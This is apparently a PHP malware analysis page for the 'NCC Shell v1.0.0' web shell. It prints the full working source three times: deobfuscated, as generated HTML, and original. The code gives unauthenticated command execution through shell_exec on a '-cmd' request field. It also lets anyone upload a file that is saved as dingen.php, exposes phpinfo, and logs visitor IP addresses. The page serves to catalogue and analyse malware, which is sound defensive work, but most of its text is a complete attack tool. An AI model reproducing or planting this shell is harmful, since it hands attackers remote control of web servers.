NCC-Shell.txt

md5: 77970bda2a9061e9f48385ea6cca0699

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
phpinfo (Deobfuscated, HTML, Original)

Execution
shell_exec (Deobfuscated, HTML, Original)

Files
move_uploaded_file (Deobfuscated, HTML, Original)

Input
_FILES (Deobfuscated, HTML, Original)
_GET (Deobfuscated, HTML, Original)

URLs
http://www.n-c-c.6x.to (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<center>
<h1>.:NCC:. Shell v1.0.0</h1>
<title>.:NCC:. Shell v1.0.0</title>
<head><h2>Hacked by Silver</h2></head>
<h1>---------------------------------------------------------------------------------------</h1><br>
<b><font color=red>---Server Info---</font></b><br>
<?php 
echo "<b><font color=red>Safe Mode on/off:  </font></b>";
// Check for safe mode
if (ini_get('safe_mode')) {
    print "<font color=#FF0000><b>Safe Mode ON</b></font>";
} else {
    print "<font color=#008000><b>Safe Mode OFF</b></font>";
}
echo "</br>";
echo "<b><font color=red>Momentane Directory:  </font></b>";
echo $_SERVER['DOCUMENT_ROOT'];
echo "</br>";
echo "<b><font color=red>Server: </font></b><br>";
echo $_SERVER['SERVER_SIGNATURE'];
echo "<a href='{$php_self}?p=info'>PHPinfo</a>";
if (@$_GET['p'] == "info") {
    @phpinfo();
    exit;
}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>- Upload -</h2>
<title>Upload - Shell/Datei</title>
<form
 action="<?php 
echo $_SERVER['PHP_SELF'];
?>"
 method="post"
 enctype="multipart/form-data">
<input type="file" name="Upload" />
<input type="submit" value="Upload!" />
</form>
<hr />
<?php 
if (isset($_FILES['probe']) and !$_FILES['probe']['error']) {
    // Alternativ:            and   $_FILES['probe']['size']
    move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
    printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n", $_FILES['probe']['name']);
    printf("Sie ist %u Bytes gro\xc3\x9f und vom Typ %s.<br />\n", $_FILES['probe']['size'], $_FILES['probe']['type']);
}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>IpLogger</h2>
<?php 
echo "<b><font color=red><br>IP: </font></b>";
echo $_SERVER['REMOTE_ADDR'];
echo "<b><font color=red><br>PORT: </font></b>";
echo $_SERVER['REMOTE_PORT'];
echo "<b><font color=red><br>BROWSER: </font></b>";
echo $_SERVER[HTTP_REFERER];
echo "<b><font color=red><br>REFERER: </font></b>";
echo $_SERVER['HTTP_USER_AGENT'];
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>Directory Lister</h2>
<?php 
$cmd = $_REQUEST["-cmd"];
?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?php 
echo $cmd;
?>><hr><pre><?php 
if ($cmd != "") {
    print Shell_Exec($cmd);
}
?></pre></form><br>
<h1>---------------------------------------------------------------------------</h1><br>
<b>--Coded by Silver©--<br>
~|_Team .:National Cracker Crew:._|~<br>
<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>
Execution traces
Generated HTML code
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">&lt;center&gt;
&lt;h1&gt;.:NCC:. Shell v1.0.0&lt;/h1&gt;
&lt;title&gt;.:NCC:. Shell v1.0.0&lt;/title&gt;
&lt;head&gt;&lt;h2&gt;Hacked by Silver&lt;/h2&gt;&lt;/head&gt;
&lt;h1&gt;---------------------------------------------------------------------------------------&lt;/h1&gt;&lt;br&gt;
&lt;b&gt;&lt;font color=red&gt;---Server Info---&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
&lt;?php
echo "&lt;b&gt;&lt;font color=red&gt;Safe Mode on/off:  &lt;/font&gt;&lt;/b&gt;";
// Check for safe mode
if( ini_get('safe_mode') ) {
  print '&lt;font color=#FF0000&gt;&lt;b&gt;Safe Mode ON&lt;/b&gt;&lt;/font&gt;';
} else {
  print '&lt;font color=#008000&gt;&lt;b&gt;Safe Mode OFF&lt;/b&gt;&lt;/font&gt;';
}
echo "&lt;/br&gt;";
echo "&lt;b&gt;&lt;font color=red&gt;Momentane Directory:  &lt;/font&gt;&lt;/b&gt;"; echo $_SERVER['DOCUMENT_ROOT'];
echo "&lt;/br&gt;";
echo "&lt;b&gt;&lt;font color=red&gt;Server: &lt;/font&gt;&lt;/b&gt;&lt;br&gt;"; echo $_SERVER['SERVER_SIGNATURE'];
echo "&lt;a href='$php_self?p=info'&gt;PHPinfo&lt;/a&gt;";
if(@$_GET['p']=="info"){
@phpinfo();
exit;}
?&gt;
&lt;h1&gt;---------------------------------------------------------------------------&lt;/h1&gt;&lt;br&gt;
&lt;h2&gt;- Upload -&lt;/h2&gt;
&lt;title&gt;Upload - Shell/Datei&lt;/title&gt;
&lt;form
 action="&lt;?php echo $_SERVER['PHP_SELF']; ?&gt;"
 method="post"
 enctype="multipart/form-data"&gt;
&lt;input type="file" name="Upload" /&gt;
&lt;input type="submit" value="Upload!" /&gt;
&lt;/form&gt;
&lt;hr /&gt;
&lt;?php

 if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
   // Alternativ:            and   $_FILES['probe']['size']
   move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
   printf("Die Datei %s wurde als dingen.php hochgeladen.&lt;br /&gt;\n",
     $_FILES['probe']['name']);
   printf("Sie ist %u Bytes groÃŸ und vom Typ %s.&lt;br /&gt;\n",
     $_FILES['probe']['size'], $_FILES['probe']['type']);
 }
?&gt;
&lt;h1&gt;---------------------------------------------------------------------------&lt;/h1&gt;&lt;br&gt;
&lt;h2&gt;IpLogger&lt;/h2&gt;
&lt;?php
echo "&lt;b&gt;&lt;font color=red&gt;&lt;br&gt;IP: &lt;/font&gt;&lt;/b&gt;"; echo $_SERVER['REMOTE_ADDR'];
echo "&lt;b&gt;&lt;font color=red&gt;&lt;br&gt;PORT: &lt;/font&gt;&lt;/b&gt;"; echo $_SERVER['REMOTE_PORT'];
echo "&lt;b&gt;&lt;font color=red&gt;&lt;br&gt;BROWSER: &lt;/font&gt;&lt;/b&gt;"; echo $_SERVER[HTTP_REFERER];
echo "&lt;b&gt;&lt;font color=red&gt;&lt;br&gt;REFERER: &lt;/font&gt;&lt;/b&gt;"; echo $_SERVER['HTTP_USER_AGENT'];
?&gt;
&lt;h1&gt;---------------------------------------------------------------------------&lt;/h1&gt;&lt;br&gt;
&lt;h2&gt;Directory Lister&lt;/h2&gt;
&lt;? $cmd = $_REQUEST["-cmd"];?&gt;&lt;onLoad="document.forms[0].elements[-cmd].focus()"&gt;&lt;form method=POST&gt;&lt;br&gt;&lt;input type=TEXT name="-cmd" size=64 value=&lt;?=$cmd?&gt;&gt;&lt;hr&gt;&lt;pre&gt;&lt;?if($cmd != "") print Shell_Exec($cmd);?&gt;&lt;/pre&gt;&lt;/form&gt;&lt;br&gt;
&lt;h1&gt;---------------------------------------------------------------------------&lt;/h1&gt;&lt;br&gt;
&lt;b&gt;--Coded by SilverÂ©--&lt;br&gt;
~|_Team .:National Cracker Crew:._|~&lt;br&gt;
&lt;a href="http://www.n-c-c.6x.to" target="_blank"&gt;--&gt;NCC&lt;--&lt;/a&gt;&lt;/center&gt;&lt;/b&gt;&lt;/html&gt;
</pre></body></html>
Original PHP code
<center>
<h1>.:NCC:. Shell v1.0.0</h1>
<title>.:NCC:. Shell v1.0.0</title>
<head><h2>Hacked by Silver</h2></head>
<h1>---------------------------------------------------------------------------------------</h1><br>
<b><font color=red>---Server Info---</font></b><br>
<?php
echo "<b><font color=red>Safe Mode on/off:  </font></b>";
// Check for safe mode
if( ini_get('safe_mode') ) {
  print '<font color=#FF0000><b>Safe Mode ON</b></font>';
} else {
  print '<font color=#008000><b>Safe Mode OFF</b></font>';
}
echo "</br>";
echo "<b><font color=red>Momentane Directory:  </font></b>"; echo $_SERVER['DOCUMENT_ROOT'];
echo "</br>";
echo "<b><font color=red>Server: </font></b><br>"; echo $_SERVER['SERVER_SIGNATURE'];
echo "<a href='$php_self?p=info'>PHPinfo</a>";
if(@$_GET['p']=="info"){
@phpinfo();
exit;}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>- Upload -</h2>
<title>Upload - Shell/Datei</title>
<form
 action="<?php echo $_SERVER['PHP_SELF']; ?>"
 method="post"
 enctype="multipart/form-data">
<input type="file" name="Upload" />
<input type="submit" value="Upload!" />
</form>
<hr />
<?php

 if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
   // Alternativ:            and   $_FILES['probe']['size']
   move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
   printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n",
     $_FILES['probe']['name']);
   printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n",
     $_FILES['probe']['size'], $_FILES['probe']['type']);
 }
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>IpLogger</h2>
<?php
echo "<b><font color=red><br>IP: </font></b>"; echo $_SERVER['REMOTE_ADDR'];
echo "<b><font color=red><br>PORT: </font></b>"; echo $_SERVER['REMOTE_PORT'];
echo "<b><font color=red><br>BROWSER: </font></b>"; echo $_SERVER[HTTP_REFERER];
echo "<b><font color=red><br>REFERER: </font></b>"; echo $_SERVER['HTTP_USER_AGENT'];
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>Directory Lister</h2>
<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?=$cmd?>><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
<h1>---------------------------------------------------------------------------</h1><br>
<b>--Coded by Silver©--<br>
~|_Team .:National Cracker Crew:._|~<br>
<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>
PHP Malware Analysis

NCC-Shell.txt

md5: 77970bda2a9061e9f48385ea6cca0699

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
